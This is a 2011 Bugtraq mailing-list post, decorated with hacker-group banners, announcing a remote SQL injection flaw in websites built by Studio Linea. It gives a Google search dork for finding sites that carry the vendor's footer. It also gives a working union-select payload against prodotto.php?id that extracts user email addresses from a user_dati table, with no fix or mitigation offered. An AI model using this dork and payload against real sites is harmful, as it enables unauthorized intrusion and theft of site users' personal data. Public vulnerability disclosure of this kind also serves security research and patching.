
Date: Thu, 1 Sep 2011 16:32:16 GMT
From: ehsan_hp200@...mail.com
To: bugtraq@...urityfocus.com
Subject: Studio Linea (prodotto.php?id) Remote SQL injection Vulnerability

################################  IRANIAN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
## Studio Linea (prodotto.php?id)
##                           
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : Ehsan_Hp200@...mail.com
##  
## Vendor : http://www.studiolinea.com/
##  
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
#############################
##
##

Dork : "Designed by Studio Linea srl"

Exploite:

www.victim.com/prodotto.php?id=-5 union select 1,usr_email,3,4,5,6,7,8,9,10,11,12,13,14,15 from user_dati--

#########################################################################################
SpeCial TanX To : Skote_Vahshat
##########################################################################################
###############################  IRANIAN THE BEST HACKERS IN THE WORLD ##################           
